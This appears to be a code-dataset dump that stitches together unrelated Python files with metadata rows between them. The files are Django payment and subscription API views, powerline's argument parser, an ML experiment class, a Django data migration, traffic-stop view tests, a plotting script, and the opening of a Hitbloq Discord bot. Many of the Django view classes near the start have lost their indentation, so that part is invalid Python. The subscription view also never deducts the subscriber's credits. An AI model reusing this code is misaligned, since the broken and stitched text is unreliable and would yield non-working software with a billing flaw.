        subscribe_target = get_object_or_404(User, pk=pk)
        if user.credit_amount > subscribe_target.subscribtion_price:
            user.my_subscribes.add(subscribe_target)
            subscribe_target.fans_amount += 1
            subscribe_target.earned_credits_amount += subscribe_target.subscribtion_price
            subscribe_target.save()
            referrer = subscribe_target.referrer
            if referrer:
                # The referrer earns a share of every subscription payment.
                referrer.earned_credits_amount += subscribe_target.subscribtion_price * REF_PERCANTAGE
                referrer.save()
            # NOTE(review): the subscriber's credit_amount is never decreased
            # here -- confirm whether the charge is applied elsewhere.
            user.save()
            subscription_datetime = datetime.now()
            # Bug fix: the original stored `start_date=...timestamp()` (a
            # float) and called `.timestamp()` on a timedelta, which raised
            # AttributeError on every successful subscription. Elsewhere in
            # this module these fields are compared against datetimes
            # (`end_date__gte=datetime.now()`, `start_date__date__month`), so
            # plain datetime objects are stored. `create()` already persists,
            # so the redundant trailing `.save()` is gone.
            Subscription.objects.create(
                source=user,
                target=subscribe_target,
                start_date=subscription_datetime,
                end_date=subscription_datetime + timedelta(
                    days=subscribe_target.subscribtion_duration
                ),
            )
            return api_accepted_202(
                {
                    "subscriber": user.pk,
                    "subscribed": subscribe_target.pk
                }
            )
        return api_payment_required_402(
            {
                "need_to_pay": subscribe_target.subscribtion_price - user.credit_amount
            }
        )
class CardRetrieveAPI(generics.RetrieveAPIView):
queryset = Card.objects.all()
serializer_class = CardGetSerializer
class CardCreateAPI(generics.CreateAPIView):
queryset = Card.objects.all()
serializer_class = CardCreationSerializer
def get_serializer_context(self):
return {'request': self.request}
class CardAPI(generics.RetrieveUpdateDestroyAPIView):
queryset = Card.objects.all()
serializer_class = CardCreationSerializer
class CardPartialUpdateAPI(GenericAPIView, UpdateModelMixin):
queryset = Card.objects.all()
serializer_class = CardCreationSerializer
def put(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
class DonationRetrieveAPI(generics.RetrieveAPIView):
queryset = Donation.objects.all()
serializer_class = DonationGetSerializer
class AddBlockedUserAPI(generics.GenericAPIView):
permission_classes = (permissions.IsAuthenticated, )
queryset = User.objects.all()
serializer_class = UserBlockSerializer
def get_object(self):
return self.request.user
def put(self, request, *args, **kwargs):
user = User.objects.get(username=request.data['username'])
if request.data['block']:
self.request.user.blocked_users.add(user)
else:
self.request.user.blocked_users.remove(user)
self.request.user.save()
data = {
'user': user.pk,
'block': request.data['block']
}
return Response(data)
class DonationCreateAPI(generics.CreateAPIView):
    """Create a ``Donation``; responds 451 when the sender lacks credits."""
    queryset = Donation.objects.all()
    serializer_class = DonationCreationSerializer

    def create(self, request, *args, **kwargs):
        serializer = self.get_serializer(data=request.data)
        try:
            serializer.is_valid(raise_exception=True)
        # NOTE(review): the sibling CreateSubscriptioAPI catches
        # AssertionError for the same "not enough credits" case -- confirm
        # which exception the serializer actually raises here.
        except ValueError:
            return api_block_by_policy_451({"status": "not enought credits"})
        self.perform_create(serializer)
        return Response(serializer.data)

    def get_serializer_context(self):
        # The original defined this method twice (identical bodies); the
        # shadowed duplicate has been removed.
        return {'request': self.request}
class PaymentRetrieveAPI(generics.RetrieveAPIView):
queryset = Payment.objects.all()
serializer_class = PaymentGetSerializer
class PaymentCreateAPI(generics.CreateAPIView):
queryset = Payment.objects.all()
serializer_class = PaymentCreationSerializer
def get_serializer_context(self):
return {'request': self.request}
class PendingUserCreateAPI(generics.CreateAPIView):
queryset = PendingUser.objects.all()
serializer_class = PendingUserCreationSerializer
def get_object(self):
return self.request.user
class UserOnlineRetrieveAPI(generics.RetrieveAPIView):
queryset = UserOnline.objects.all()
serializer_class = UserOnlineGetSerializer
class UserOnlineCreateAPI(generics.GenericAPIView):
queryset = UserOnline.objects.all()
serializer_class = UserOnlineCreationSerializer
def get_serializer_context(self):
return {'request': self.request}
def post(self, request):
serializer = self.get_serializer(data=request.data)
try:
serializer.is_valid(raise_exception=True)
except AssertionError:
return api_bad_request_400({"status": "bad request"})
UserOnline.objects.create_or_update(
user=request.user
)
return Response(serializer.data)
class DonationPayedUserRetrieveAPI(generics.ListAPIView):
queryset = Donation.objects.all()
serializer_class = DonationGetSerializer
def get_queryset(self):
reciever = self.request.user
return Donation.objects.filter(
reciever=reciever
).order_by('-datetime')
class DonationPayedUserToRetrieveAPI(generics.ListAPIView):
queryset = Donation.objects.all()
serializer_class = DonationGetSerializer
def get_queryset(self):
sender = self.request.user
return Donation.objects.filter(
sender=sender
).order_by('-datetime')
class PaymentUserHistoryRetrieveAPI(generics.ListAPIView):
queryset = Payment.objects.all()
serializer_class = PaymentGetSerializer
def get_queryset(self):
sender = self.request.user
return Payment.objects.filter(
card__user=sender
).order_by('-datetime')
class PayStatsHistoryRetrieveAPI(APIView):
    """Return the current month's earnings (donations + subscriptions) for
    the requesting user, together with the underlying records.
    """

    def get(self, request, *args,):
        # NOTE(review): filtering by month only ignores the year -- January
        # 2020 and January 2021 records are mixed together; confirm intent.
        current_month = datetime.now().month
        user = request.user
        donations = Donation.objects.filter(
            # Bug fix: `reciever` matches the (misspelled) model field used
            # elsewhere in this module (see DonationPayedUserRetrieveAPI);
            # the original `receiver=...` raised FieldError at runtime.
            reciever=user,
            # Bug fix: the original `datetime__datetime__date__month` doubled
            # the field name; the field is `datetime` (cf. order_by below).
            datetime__date__month=current_month,
        ).order_by('-datetime')
        donation_amount = sum(donation.amount for donation in donations)
        subscriptions = Subscription.objects.filter(
            target=user,
            start_date__date__month=current_month,
        ).order_by('-start_date')
        # Equivalent to the original's per-item sum of a constant.
        # NOTE(review): this multiplies by `subscribtion_duration` (days),
        # not a price -- confirm the intended semantics.
        subscription_amount = user.subscribtion_duration * len(subscriptions)
        result_sum = subscription_amount + donation_amount
        result = {
            'result_sum': result_sum,
            'donations': DonationGetSerializer(
                instance=donations,
                many=True
            ).data,
            'subscriptions': SubscriptionGetSerializer(
                instance=subscriptions,
                many=True
            ).data,
        }
        return Response(result)
| 32.971922
| 102
| 0.631796
| 14,185
| 0.926337
| 0
| 0
| 0
| 0
| 0
| 0
| 842
| 0.054986
|
366eba2a1a7b41a03aed067b028dd47e05783a38
| 7,102
|
py
|
Python
|
powerline/commands/main.py
|
OSunday/powerline
|
f6bf7b4916dc377a5ffe13caff171fbaa3ab02f6
|
[
"MIT"
] | 15
|
2017-10-02T06:09:07.000Z
|
2020-01-17T07:53:58.000Z
|
powerline/commands/main.py
|
OSunday/powerline
|
f6bf7b4916dc377a5ffe13caff171fbaa3ab02f6
|
[
"MIT"
] | null | null | null |
powerline/commands/main.py
|
OSunday/powerline
|
f6bf7b4916dc377a5ffe13caff171fbaa3ab02f6
|
[
"MIT"
] | 6
|
2017-10-03T15:48:12.000Z
|
2021-08-28T18:07:29.000Z
|
# vim:fileencoding=utf-8:noet
# WARNING: using unicode_literals causes errors in argparse
from __future__ import (division, absolute_import, print_function)
import argparse
import sys
from itertools import chain
from powerline.lib.overrides import parsedotval, parse_override_var
from powerline.lib.dict import mergeargs
from powerline.lib.encoding import get_preferred_arguments_encoding
from powerline.lib.unicode import u, unicode
from powerline.bindings.wm import wm_threads
if sys.version_info < (3,):
encoding = get_preferred_arguments_encoding()
def arg_to_unicode(s):
return unicode(s, encoding, 'replace') if not isinstance(s, unicode) else s # NOQA
else:
def arg_to_unicode(s):
return s
def finish_args(parser, environ, args, is_daemon=False):
	'''Do some final transformations

	Transforms ``*_override`` arguments into dictionaries, adding overrides from
	environment variables. Transforms ``renderer_arg`` argument into dictionary
	as well, but only if it is true.

	:param parser:
		Argument parser, used only to report usage errors (``parser.error``).
	:param dict environ:
		Environment from which additional overrides should be taken from.
	:param args:
		Arguments object returned by
		:py:meth:`argparse.ArgumentParser.parse_args`. Will be modified
		in-place.
	:param bool is_daemon:
		True when running inside the powerline daemon; ``wm.*`` extensions
		are only allowed in that case.

	:return: Object received as second (``args``) argument.
	'''
	# Environment-variable overrides come first so that explicit command-line
	# overrides win when merged.
	args.config_override = mergeargs(chain(
		parse_override_var(environ.get('POWERLINE_CONFIG_OVERRIDES', '')),
		(parsedotval(v) for v in args.config_override or ()),
	))
	args.theme_override = mergeargs(chain(
		parse_override_var(environ.get('POWERLINE_THEME_OVERRIDES', '')),
		(parsedotval(v) for v in args.theme_override or ()),
	))
	if args.renderer_arg:
		args.renderer_arg = mergeargs((parsedotval(v) for v in args.renderer_arg), remove=True)
		if 'pane_id' in args.renderer_arg:
			if isinstance(args.renderer_arg['pane_id'], (bytes, unicode)):
				try:
					# tmux pane ids look like '%42': strip the marker, parse the int.
					args.renderer_arg['pane_id'] = int(args.renderer_arg['pane_id'].lstrip(' %'))
				except ValueError:
					# Leave non-numeric ids as-is.
					pass
			if 'client_id' not in args.renderer_arg:
				args.renderer_arg['client_id'] = args.renderer_arg['pane_id']
	# Paths from the environment take precedence over -p arguments.
	args.config_path = (
		[path for path in environ.get('POWERLINE_CONFIG_PATHS', '').split(':') if path]
		+ (args.config_path or [])
	)
	if args.ext[0].startswith('wm.'):
		if not is_daemon:
			parser.error('WM bindings must be used with daemon only')
		elif args.ext[0][3:] not in wm_threads:
			parser.error('WM binding not found')
	elif not args.side:
		# Non-WM extensions require the positional `side` argument.
		parser.error('expected one argument')
	return args
def int_or_sig(s):
	'''Convert *s* to an integer, keeping signal names (``sig*``) as text.'''
	return u(s) if s.startswith('sig') else int(s)
def get_argparser(ArgumentParser=argparse.ArgumentParser):
parser = ArgumentParser(description='Powerline prompt and statusline script.')
parser.add_argument(
'ext', nargs=1,
help='Extension: application for which powerline command is launched '
'(usually `shell\' or `tmux\'). Also supports `wm.\' extensions: '
+ ', '.join(('`wm.' + key + '\'' for key in wm_threads.keys())) + '.'
)
parser.add_argument(
'side', nargs='?', choices=('left', 'right', 'above', 'aboveleft'),
help='Side: `left\' and `right\' represent left and right side '
'respectively, `above\' emits lines that are supposed to be printed '
'just above the prompt and `aboveleft\' is like concatenating '
'`above\' with `left\' with the exception that only one Python '
'instance is used in this case. May be omitted for `wm.*\' extensions.'
)
parser.add_argument(
'-r', '--renderer-module', metavar='MODULE', type=str,
help='Renderer module. Usually something like `.bash\' or `.zsh\' '
'(with leading dot) which is `powerline.renderers.{ext}{MODULE}\', '
'may also be full module name (must contain at least one dot or '
'end with a dot in case it is top-level module) or '
'`powerline.renderers\' submodule (in case there are no dots).'
)
parser.add_argument(
'-w', '--width', type=int,
help='Maximum prompt with. Triggers truncation of some segments.'
)
parser.add_argument(
'--last-exit-code', metavar='INT', type=int_or_sig,
help='Last exit code.'
)
parser.add_argument(
'--last-pipe-status', metavar='LIST', default='',
type=lambda s: [int_or_sig(status) for status in s.split()],
help='Like above, but is supposed to contain space-separated array '
'of statuses, representing exit statuses of commands in one pipe.'
)
parser.add_argument(
'--jobnum', metavar='INT', type=int,
help='Number of jobs.'
)
parser.add_argument(
'-c', '--config-override', metavar='KEY.KEY=VALUE', type=arg_to_unicode,
action='append',
help='Configuration overrides for `config.json\'. Is translated to a '
'dictionary and merged with the dictionary obtained from actual '
'JSON configuration: KEY.KEY=VALUE is translated to '
'`{"KEY": {"KEY": VALUE}}\' and then merged recursively. '
'VALUE may be any JSON value, values that are not '
'`null\', `true\', `false\', start with digit, `{\', `[\' '
'are treated like strings. If VALUE is omitted '
'then corresponding key is removed.'
)
parser.add_argument(
'-t', '--theme-override', metavar='THEME.KEY.KEY=VALUE', type=arg_to_unicode,
action='append',
help='Like above, but theme-specific. THEME should point to '
'an existing and used theme to have any effect, but it is fine '
'to use any theme here.'
)
parser.add_argument(
'-R', '--renderer-arg',
metavar='KEY=VAL', type=arg_to_unicode, action='append',
help='Like above, but provides argument for renderer. Is supposed '
'to be used only by shell bindings to provide various data like '
'last-exit-code or last-pipe-status (they are not using '
'`--renderer-arg\' for historical resons: `--renderer-arg\' '
'was added later).'
)
parser.add_argument(
'-p', '--config-path', action='append', metavar='PATH',
help='Path to configuration directory. If it is present then '
'configuration files will only be seeked in the provided path. '
'May be provided multiple times to search in a list of directories.'
)
parser.add_argument(
'--socket', metavar='ADDRESS', type=str,
help='Socket address to use in daemon clients. Is always UNIX domain '
'socket on linux and file socket on Mac OS X. Not used here, '
'present only for compatibility with other powerline clients. '
'This argument must always be the first one and be in a form '
'`--socket ADDRESS\': no `=\' or short form allowed '
'(in other powerline clients, not here).'
)
return parser
def write_output(args, powerline, segment_info, write):
	'''Render the requested powerline output and hand it to *write*.

	``above``/``aboveleft`` sides first emit the lines printed above the
	prompt (one ``write`` per non-empty line, newline-terminated), then fall
	through to the remaining side, if any. ``args.side`` is updated in-place
	when the ``above`` prefix is consumed.
	'''
	if args.renderer_arg:
		# Renderer arguments double as extra segment_info entries.
		segment_info.update(args.renderer_arg)
	if args.side.startswith('above'):
		above_lines = powerline.render_above_lines(
			width=args.width,
			segment_info=segment_info,
			mode=segment_info.get('mode', None),
		)
		for above_line in above_lines:
			if above_line:
				write(above_line + '\n')
		# '' for plain `above`, 'left' for `aboveleft`.
		args.side = args.side[len('above'):]
	if args.side:
		write(powerline.render(
			width=args.width,
			side=args.side,
			segment_info=segment_info,
			mode=segment_info.get('mode', None),
		))
| 37.183246
| 89
| 0.696987
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,660
| 0.515348
|
366f7150d8d059f7a7975d57fa08b372b8cccd5e
| 2,126
|
py
|
Python
|
hunter/mlops/experiments/experiment.py
|
akamlani/hunter-core
|
98b08b69fc460eb4cb75e67a36f86e80e03029bd
|
[
"MIT"
] | null | null | null |
hunter/mlops/experiments/experiment.py
|
akamlani/hunter-core
|
98b08b69fc460eb4cb75e67a36f86e80e03029bd
|
[
"MIT"
] | null | null | null |
hunter/mlops/experiments/experiment.py
|
akamlani/hunter-core
|
98b08b69fc460eb4cb75e67a36f86e80e03029bd
|
[
"MIT"
] | null | null | null |
import numpy as np
import os
import time
import shutil
import logging
logger = logging.getLogger(__name__)
class Experiment(object):
    """Create experiment directory structure, track, and store data.

    To be used as a base class or derived `Experiment` classes.
    """

    def __init__(self, project_name: str, experiment_dir: str = "dev-platform/experiments/snapshots", tags: dict = None) -> None:
        """Initialize Experiment class instance.

        Args:
            project_name (str): Name of the project.
            experiment_dir (str, optional): Path (relative to ``$HOME``) of
                the experiment snapshots location.
            tags (dict, optional): Mapping of tag names to values to
                associate with the experiment.
        """
        super().__init__()
        # Recreate the project directory from the shared template tree.
        user_home = os.getenv("HOME")
        experiment_dir = os.path.join(user_home, experiment_dir)
        template_dir = os.path.join(experiment_dir, "template")
        project_dir = os.path.join(experiment_dir, project_name)
        self._project_dir = project_dir
        self._export_dir = os.path.join(self._project_dir, "exports")
        self._model_dir = os.path.join(self._export_dir, "artifacts")
        self._copy_dir_template(template_dir, project_dir)
        # Bug fix: the original unconditionally called `tags.items()`, which
        # raised AttributeError for the default `tags=None` (and the
        # parameter was annotated `list` although a mapping is required).
        self._tags = dict(tags) if tags else {}
        self._name = project_name
        self._id = -1

    def list_project_dir(self):
        """Print the top-level contents of the project directory."""
        print(os.listdir(self._project_dir))

    @property
    def name(self):
        """str: Project name."""
        return self._name

    @property
    def experiment_id(self):
        """int: Experiment id (-1 until assigned)."""
        return self._id

    @property
    def tags(self):
        """dict: Tags associated with the experiment."""
        return self._tags

    def add_data_uri(self, data_uri):
        """Record the URI of the data source."""
        self.datasrc_uri = data_uri

    def add_vocab_uri(self, vocab_uri):
        """Record the URI of the vocabulary source."""
        self.vocabsrc_uri = vocab_uri

    def _add_tag(self, tag):
        """Add a single tag object exposing ``.key`` and ``.value``."""
        self._tags[tag.key] = tag.value

    def _copy_dir_template(self, src, dest):
        """Copy the template tree *src* to *dest*, replacing any existing tree."""
        if os.path.exists(dest):
            shutil.rmtree(dest)
        shutil.copytree(src, dest)

    def __repr__(self):
        return f"{self.name}"
| 27.973684
| 122
| 0.62841
| 2,009
| 0.944967
| 0
| 0
| 172
| 0.080903
| 0
| 0
| 561
| 0.263876
|
36708e40843ebac43aa8a9c519fbf7f8e02640d2
| 1,895
|
py
|
Python
|
blousebrothers/confs/migrations/0044_subscriptions_bonus.py
|
sladinji/blousebrothers
|
461de3ba011c0aaed3f0014136c4497b6890d086
|
[
"MIT"
] | 1
|
2022-01-27T11:58:10.000Z
|
2022-01-27T11:58:10.000Z
|
blousebrothers/confs/migrations/0044_subscriptions_bonus.py
|
sladinji/blousebrothers
|
461de3ba011c0aaed3f0014136c4497b6890d086
|
[
"MIT"
] | 5
|
2021-03-19T00:01:54.000Z
|
2022-03-11T23:46:21.000Z
|
blousebrothers/confs/migrations/0044_subscriptions_bonus.py
|
sladinji/blousebrothers
|
461de3ba011c0aaed3f0014136c4497b6890d086
|
[
"MIT"
] | null | null | null |
from django.db import migrations
from decimal import Decimal
from dateutil.relativedelta import relativedelta
from datetime import date
def fix_subscription(apps, schema_editor):
    """Data migration: collapse all subscriptions onto type id=5, push their
    due date out by 12 months, and attach bonus-related attributes to the
    'Abo' product class.
    """
    Subscription = apps.get_model('confs', 'Subscription')
    SubscriptionType = apps.get_model('confs', 'SubscriptionType')
    # update presale sub past due date
    pdate = date.today() + relativedelta(months=+12)
    Subscription.objects.all().update(date_over=pdate)
    Subscription.objects.all().update(type_id=5)
    # Keep only subscription type id=5 and give it a 2-euro bonus.
    SubscriptionType.objects.exclude(id=5).delete()
    sub = SubscriptionType.objects.first()
    if sub:
        sub.bonus = Decimal('2')
        sub.save()
    else:
        # Nothing to migrate (e.g. fresh database): skip catalogue changes too.
        return
    # Update Abo product type
    Product = apps.get_model('catalogue', 'Product')
    ProductAttribute = apps.get_model('catalogue', 'ProductAttribute')
    ProductAttributeValue = apps.get_model('catalogue', 'ProductAttributeValue')
    # NOTE(review): assumes exactly one product whose title contains 'abo';
    # `.get()` raises if there are zero or several.
    abo = Product.objects.filter(title__icontains='abo').get()
    pclass = abo.product_class
    bonus = ProductAttribute(name='bonus', code='bonus', type='text')
    bonus.save()
    email_msg = ProductAttribute(name='email_msg', code='email_msg', type='richtext')
    email_msg.save()
    bonus_sponsor = ProductAttribute(name='bonus_sponsor', code='bonus_sponsor', type='text')
    bonus_sponsor.save()
    pclass.attributes.add(bonus, email_msg, bonus_sponsor)
    pclass.save()
    # Add a 2-euro bonus attribute to the presale subscription product.
    mybonus = ProductAttributeValue(attribute=bonus, value_text='2.00', product=abo)
    mybonus.save()
    abo.attribute_values.add(mybonus)
    abo.save()
class Migration(migrations.Migration):
    """Run the `fix_subscription` data migration after 0043."""

    dependencies = [
        ('confs', '0043_auto_20170206_0855'),
    ]
    operations = [
        # omit reverse_code=... if you don't want the migration to be reversible.
        migrations.RunPython(fix_subscription),
    ]
| 32.118644
| 93
| 0.705013
| 268
| 0.141276
| 0
| 0
| 0
| 0
| 0
| 0
| 446
| 0.235108
|
367177f87916e9f31a627747b9f2f2e7f5f23e29
| 1,771
|
py
|
Python
|
NLP-Model/GraphGenerator.py
|
AdityaPrasadMishra/NLP--Project-Group-16
|
fb62cc6a1db4a494058171f11c14a2be3933a9a1
|
[
"MIT"
] | null | null | null |
NLP-Model/GraphGenerator.py
|
AdityaPrasadMishra/NLP--Project-Group-16
|
fb62cc6a1db4a494058171f11c14a2be3933a9a1
|
[
"MIT"
] | null | null | null |
NLP-Model/GraphGenerator.py
|
AdityaPrasadMishra/NLP--Project-Group-16
|
fb62cc6a1db4a494058171f11c14a2be3933a9a1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 24 22:03:42 2018
@author: aditya
"""
import codecs
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import re
import time
import random
# Per-epoch cross-entropy losses recorded over a 25-epoch training run.
training_errors = [2.880890389084816, 2.589109110832214, 2.529299919307232, 2.4656221523880957, 2.403166337311268, 2.4464233142137526, 2.375447287261486, 2.3676583436131478, 2.3073809832334518, 2.359292232692242, 2.3350265485048296, 2.2823567962646485, 2.2687944075465203, 2.2951272314786912, 2.282493242323399, 2.2626508274674415, 2.258985004425049, 2.2431524062156676, 2.226141297519207, 2.2092211750149726, 2.215476005077362, 2.209359174370766, 2.1948138630390166, 2.193422330915928, 2.1807888588309288]
validation_errors = [2.435073028564453, 2.3433548278808596, 2.315739807128906, 2.2985709838867185, 2.2562687683105467, 2.2732557678222656, 2.2361006469726563, 2.222836364746094, 2.2145645141601564, 2.2109912719726563, 2.20832763671875, 2.1882525634765626, 2.1855752868652343, 2.183926452636719, 2.180730743408203, 2.1761441955566405, 2.1777948303222656, 2.1717729797363283, 2.1632617797851563, 2.161899658203125, 2.16302978515625, 2.155210754394531, 2.147050506591797, 2.1581705627441408, 2.1517400207519533]
epochnum = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25]


def _plot_error_curve(errors, line_style, ylabel, out_file):
    """Plot one error series against the epoch axis and save it to *out_file*."""
    figure = plt.figure()
    axes = figure.add_axes([0.1, 0.1, 0.8, 0.8])
    axes.plot(epochnum, errors, line_style)
    axes.set_xlabel('Train Epochs')
    axes.set_ylabel(ylabel)
    figure.savefig(out_file)


_plot_error_curve(training_errors, 'r', 'Training Error', 'trainAccuracy.png')
_plot_error_curve(validation_errors, 'b', 'Validation Error', 'valAccuracy.png')
plt.plot()
| 52.088235
| 506
| 0.784303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 209
| 0.118012
|
36720adea01a0055ba50050d6d0540ddb952c604
| 2,926
|
py
|
Python
|
nc/tests/test_views.py
|
OpenDataPolicingNC/Traffic-Stops
|
74e0d16ad2ac32addca6f04d34c2ddf36d023990
|
[
"MIT"
] | 25
|
2015-09-12T23:10:52.000Z
|
2021-03-24T08:39:46.000Z
|
nc/tests/test_views.py
|
OpenDataPolicingNC/Traffic-Stops
|
74e0d16ad2ac32addca6f04d34c2ddf36d023990
|
[
"MIT"
] | 159
|
2015-07-01T03:57:23.000Z
|
2021-04-17T21:09:19.000Z
|
nc/tests/test_views.py
|
copelco/NC-Traffic-Stops
|
74e0d16ad2ac32addca6f04d34c2ddf36d023990
|
[
"MIT"
] | 8
|
2015-10-02T16:56:40.000Z
|
2020-10-18T01:16:29.000Z
|
from django.core.urlresolvers import reverse
from django.test import TestCase
from nc.tests import factories
class ViewTests(TestCase):
    """Smoke tests for the NC app's public views."""

    multi_db = True

    def test_home(self):
        """The NC homepage renders successfully."""
        response = self.client.get(reverse('nc:home'))
        self.assertEqual(200, response.status_code)

    def test_search(self):
        """The stop-search page renders successfully."""
        response = self.client.get(reverse('nc:stops-search'))
        self.assertEqual(200, response.status_code)

    def test_agency_detail(self):
        """An agency detail page renders for an existing agency."""
        agency = factories.AgencyFactory(name="Durham")
        response = self.client.get(reverse('nc:agency-detail', args=[agency.pk]))
        self.assertEqual(200, response.status_code)

    def test_agency_list(self):
        """The agency list page renders successfully."""
        response = self.client.get(reverse('nc:agency-list'))
        self.assertEqual(200, response.status_code)

    def test_agency_list_sorted_agencies(self):
        """
        Verify that agencies are delivered in an appropriately sorted and
        chunked form.
        """
        # Five agencies per initial letter (A, D, G) so the view must chunk
        # each letter's agencies into groups of 2, 2, and 1.
        factories.AgencyFactory(name="Abc")
        factories.AgencyFactory(name="Def")
        factories.AgencyFactory(name="Ghi")
        factories.AgencyFactory(name="Abc_")
        factories.AgencyFactory(name="Def_")
        factories.AgencyFactory(name="Ghi_")
        factories.AgencyFactory(name="Abc__")
        factories.AgencyFactory(name="Def__")
        factories.AgencyFactory(name="Ghi__")
        factories.AgencyFactory(name="Abc___")
        factories.AgencyFactory(name="Def___")
        factories.AgencyFactory(name="Ghi___")
        factories.AgencyFactory(name="Abc____")
        factories.AgencyFactory(name="Def____")
        factories.AgencyFactory(name="Ghi____")
        response = self.client.get(reverse('nc:agency-list'))
        sorted_agencies = response.context['sorted_agencies']
        # Verify that there are three alphabetic categories
        self.assertEqual(3, len(sorted_agencies))
        keys = [pair[0] for pair in sorted_agencies]
        # Verify that the relevant letters are in there
        self.assertTrue("A" in keys)
        self.assertTrue("D" in keys)
        self.assertTrue("G" in keys)
        # Verify that each alphabetic category contains three chunks
        # with the appropriate number of pieces (i.e. 2, 2, 1)
        for (letter, chunks) in sorted_agencies:
            self.assertEqual(3, len(chunks))
            self.assertEqual(2, len(chunks[0]))
            self.assertEqual(2, len(chunks[1]))
            self.assertEqual(1, len(chunks[2]))

    def test_homepage_find_a_stop(self):
        """Test Find a Stop form is present on NC homepage"""
        # Bug fix: this NC test previously requested reverse('md:home')
        # (copy/paste from the MD app) even though the docstring says it
        # exercises the NC homepage; use the NC URL namespace instead.
        response = self.client.get(reverse('nc:home'))
        # make sure form is in context
        self.assertTrue('find_a_stop_form' in response.context)
        form = response.context['find_a_stop_form']
        # make sure required agency field label is present
        self.assertContains(response, form['agency'].label)
| 39.013333
| 81
| 0.66473
| 2,814
| 0.961722
| 0
| 0
| 0
| 0
| 0
| 0
| 724
| 0.247437
|
367317abfaeafe103c587d9d91dc6360e2f8aec5
| 24,706
|
py
|
Python
|
hitbloq_bot.py
|
PulseLane/hitbloq
|
94ea0563e6c2e34c0ff63b99cda8c6ff064e0910
|
[
"MIT"
] | null | null | null |
hitbloq_bot.py
|
PulseLane/hitbloq
|
94ea0563e6c2e34c0ff63b99cda8c6ff064e0910
|
[
"MIT"
] | null | null | null |
hitbloq_bot.py
|
PulseLane/hitbloq
|
94ea0563e6c2e34c0ff63b99cda8c6ff064e0910
|
[
"MIT"
] | null | null | null |
import asyncio
import json
import time
import sys
import discord
from discord.utils import get
import create_action
from db import database
import beatsaver
from cr_formulas import curves
from general import full_clean
# Shared BeatSaver API client, used by the !rank command to validate song IDs.
beatsaver_interface = beatsaver.BeatSaverInterface()
def read_f(path):
    """Read the whole text file at *path* and return its contents.

    Uses a context manager so the file handle is closed even if read()
    raises; the original closed the handle only on the success path.
    """
    with open(path, 'r') as f:
        return f.read()
# Discord bot token, kept out of the repository in data/token.txt.
token = read_f('data/token.txt')
# NOTE(review): this is matched against guild *names* in on_ready(), not a
# numeric guild ID — confirm the guild is uniquely named 'Hitbloq'.
guild_id = 'Hitbloq'
client = discord.Client()
# Channel names gating each command group handled in on_message().
GENERAL_COMMANDS_CHANNEL = 'general-commands'
ADMIN_COMMANDS_CHANNEL = 'admin-commands'
POOL_ADMIN_COMMANDS_CHANNEL = 'pool-admin-commands'
PATRON_COMMANDS_CHANNEL = 'patron-commands'
# Populated with the active guild's channel list in on_ready().
channels = []
def safe_string(s):
    """Return True when *s* is a non-empty string made only of lowercase
    letters, digits, and underscores (the character set allowed in pool IDs).
    """
    allowed = set('abcdefghijklmnopqrstuvwxyz0123456789_')
    return bool(s) and all(ch in allowed for ch in s)
def is_admin(user):
    """Return True when the Discord member carries the guild's 'admin' role."""
    return any(role.name == 'admin' for role in user.roles)
def invalid_curve_data(json_data):
    """Validate a curve configuration dict.

    Returns a human-readable error string describing the first problem
    found, or None when the configuration is acceptable. For 'linear'
    curves the points list is sorted in place (callers rely on that).
    """
    curve_type = json_data['type']
    if curve_type == 'basic':
        if 'cutoff' in json_data and json_data['cutoff'] == 0:
            return 'The cutoff may not be 0.'
    if curve_type == 'linear':
        if 'points' in json_data:
            points = json_data['points']
            points.sort()
            if len(points) > 15:
                return 'You may not have more than 15 points in your curve.'
            if (points[0] != [0, 0]) or (points[-1] != [1, 1]):
                return 'The first and last points must be `[0, 0]` and `[1, 1]` respectively.'
            x_values = [p[0] for p in points]
            if len(set(x_values)) != len(points):
                return 'The x values for every point must be unique.'
    # valid
    return None
@client.event
async def on_ready():
    """Cache the Hitbloq guild and its channel list once the gateway is up."""
    global channels, active_guild
    for guild in client.guilds:
        if guild.name != guild_id:
            continue
        active_guild = guild
        channels = guild.channels
        break
    print(client.user.name + ' has connected to Discord!')
@client.event
async def on_message(message):
    """Command dispatcher: each line of a message is parsed as one command.

    The channel the message arrived in selects which command set applies
    (patron / general / admin / pool-admin). Pool-admin commands are
    additionally gated by database.is_pool_owner() or is_admin().
    """
    global channels, active_guild
    # One command per line; args are space-separated, args[0] is the command.
    for line in message.content.split('\n'):
        message_args = line.split(' ')
        # ---------------- patron commands ----------------
        if message.channel.name == PATRON_COMMANDS_CHANNEL:
            if message_args[0] in ['!set_banner', '!set_profile_banner', '!set_profile_background']:
                # Map the command name onto the user-document field it sets.
                field = {'!set_banner': 'score_banner', '!set_profile_banner': 'profile_banner', '!set_profile_background': 'profile_background'}[message_args[0]]
                banner_url = message_args[1]
                # Only imgur-hosted png/jpeg images are accepted.
                if (banner_url[:20] == 'https://i.imgur.com/') and (banner_url.split('.')[-1] in ['png', 'jpeg', 'jpg']):
                    user_id = int(message_args[2])
                    users = database.get_users([user_id])
                    if len(users):
                        database.update_user(users[0], {'$set': {field: banner_url}})
                        await message.channel.send(message.author.mention + ' a new score banner has been set!')
                else:
                    await message.channel.send(message.author.mention + ' banner URLs must be https://i.imgur.com links and they must be png or jpeg/jpg. You can get these by right clicking the image and clicking "open image in new tab".')
            if message_args[0] == '!create_pool':
                try:
                    new_pool_id = message_args[1]
                    # Patron tier determines how many pools a user may create.
                    valid_creation_roles = ['CR Farmer', 'CR Grinder']
                    highest_role = None
                    for valid_role in valid_creation_roles:
                        if valid_role in [role.name for role in message.author.roles]:
                            highest_role = valid_role
                    if highest_role:
                        threshold = 1
                        if highest_role == 'CR Grinder':
                            threshold = 3
                        if new_pool_id not in database.get_pool_ids(True):
                            if safe_string(new_pool_id):
                                if database.get_rate_limits(message.author.id, hash=False)['pools_created'] < threshold:
                                    role = get(active_guild.roles, name='map pool people')
                                    pool_channel = get(active_guild.channels, name='pool-admin-commands')
                                    await message.author.add_roles(role)
                                    database.ratelimit_add(message.author.id, 'pools_created', hash=False)
                                    database.create_map_pool(new_pool_id)
                                    database.set_pool_owners(new_pool_id, [message.author.id])
